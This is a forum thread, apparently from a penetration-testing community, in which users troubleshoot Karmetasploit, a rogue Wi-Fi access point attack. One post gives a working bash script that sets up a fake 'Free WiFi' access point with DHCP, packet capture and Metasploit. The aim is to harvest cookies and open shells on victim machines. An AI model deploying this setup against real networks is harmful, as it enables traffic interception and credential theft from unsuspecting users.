Thread: KARMetasploit

Just burned his ISO

Question KARMetasploit

Hi,

i tried to get KARMetasploit to run. It works like a charm in combination with webmitm or fragroute but the main Target to get Cookies dont't work. I tried to edit the options in Metasploit with no luck. DHCP works, DNS works redirect WebSites from the list in the Metasploit directory dont work.

Has anybody experience with KARMetasploit.

Greetings

phobos

Just burned his ISO

Hey no Karametasploit Guys out.... I found a hint on pauldotcom. Anybody using Karmetasploit for Testing!?

Just burned his ISO

Quote Originally Posted by pho_bos View Post
    Hey no Karametasploit Guys out.... I found a hint on pauldotcom. Anybody using Karmetasploit for Testing!?

I have worked a lot with Karmetasploit just trying to get it working on with the Alfa (rtl8187) card. As for not getting cookies, try using your victim on a standard network first logging in to a couple of the sites that are a part of the framework and retrying
    Mubix
    CERT / Hacker / Security Enthusiast
    http://www.room362.com/sig.jpg

Just burned his ISO

Quote Originally Posted by mubix View Post
    I have worked a lot with Karmetasploit just trying to get it working on with the Alfa (rtl8187) card.
    have you been able to get Karmetasploit to work with that chipset completely?

I got it working with a RT2570, it took me a while but here is the script I used for it:

Code:
    #!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start rausb0

airbase-ng -P -C 30 -e "Free WiFi" -v rausb0 >/dev/null 2>&1 &
    sleep 2
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    sleep 2
    echo > /var/state/dhcp/dhcpd.leases
    dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
    sleep 2
    ifconfig at0 mtu 1800
    tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
    /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc
    I made a new dhcod.conf file changing the ip's from a copy I made of the original. I hope it is usefull to you, I know it still has a lot of improvement to be made on it, but hey it s start.
    more info at metasploit.com/dev/trac/wiki/Karmetasploit

Just burned his ISO

Greetings to all,
    Myself have played with karmetasploit, able to establish connectivity with my victim pc (XP SP 2) and open a remote command shell, but its only applicable when i change most of the security policies on the SP2 comp to bare minimum. Was wondering if there is any other ppl who can successfully exploited a SP2 comp w/o changing the security policies?

while not an answer to any specific question i did some writeups on karmetasploit.

http://carnal0wnage.blogspot.com/200...it-part-1.html
    http://carnal0wnage.blogspot.com/200...it-part-2.html

[sorry, no question at all, I've found the answers...]